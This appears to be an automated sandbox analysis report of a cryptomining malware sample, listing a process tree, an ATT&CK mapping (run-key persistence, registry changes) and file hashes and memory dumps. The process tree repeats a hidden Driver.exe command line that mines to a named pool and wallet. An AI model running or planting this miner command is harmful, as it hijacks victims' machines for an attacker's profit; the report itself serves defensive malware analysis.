                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                      2⤵
                                                                                                                                        PID:1396
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                        2⤵
                                                                                                                                          PID:1728
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                          2⤵
                                                                                                                                            PID:1856
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                            2⤵
                                                                                                                                              PID:1356
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                              2⤵
                                                                                                                                                PID:2796
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                2⤵
                                                                                                                                                  PID:2668
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2760
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2236
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2736
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                        2⤵
                                                                                                                                                          PID:980
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1404
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1720
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2940
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2488
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:296

                                                                                                                                                                Network

                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                Persistence

                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                1
                                                                                                                                                                T1547

                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                1
                                                                                                                                                                T1547.001

                                                                                                                                                                Privilege Escalation

                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                1
                                                                                                                                                                T1547

                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                1
                                                                                                                                                                T1547.001

                                                                                                                                                                Defense Evasion

                                                                                                                                                                Modify Registry

                                                                                                                                                                1
                                                                                                                                                                T1112

                                                                                                                                                                Discovery

                                                                                                                                                                System Information Discovery

                                                                                                                                                                1
                                                                                                                                                                T1082

                                                                                                                                                                Replay Monitor

                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                Downloads

                                                                                                                                                                • \Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                                  Filesize

                                                                                                                                                                  3.9MB

                                                                                                                                                                  MD5

                                                                                                                                                                  02569a7a91a71133d4a1023bf32aa6f4

                                                                                                                                                                  SHA1

                                                                                                                                                                  0f16bcb3f3f085d3d3be912195558e9f9680d574

                                                                                                                                                                  SHA256

                                                                                                                                                                  8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

                                                                                                                                                                  SHA512

                                                                                                                                                                  534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

                                                                                                                                                                • memory/688-77-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/756-174-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/840-68-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/872-18-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/896-124-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/896-99-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/940-104-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1008-88-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1352-159-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1364-119-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1364-63-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1424-52-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1492-144-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1596-169-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1692-47-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1700-164-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1736-72-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1952-41-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/1952-39-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2044-30-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2044-28-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2172-149-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2280-0-0x0000000074A8E000-0x0000000074A8F000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2280-58-0x0000000074A8E000-0x0000000074A8F000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/2280-81-0x0000000074A80000-0x000000007516E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  6.9MB

                                                                                                                                                                • memory/2280-1-0x00000000010C0000-0x00000000014BE000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4.0MB

                                                                                                                                                                • memory/2280-94-0x0000000006890000-0x0000000007405000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2280-4-0x0000000074A80000-0x000000007516E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  6.9MB

                                                                                                                                                                • memory/2280-9-0x0000000006890000-0x0000000007405000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2300-83-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2384-24-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2448-139-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2464-134-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2520-114-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2532-109-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2672-57-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2692-12-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2692-11-0x0000000000300000-0x0000000000314000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  80KB

                                                                                                                                                                • memory/2692-10-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2700-35-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2796-93-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2860-154-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB

                                                                                                                                                                • memory/2900-129-0x0000000140000000-0x0000000140B75000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  11.5MB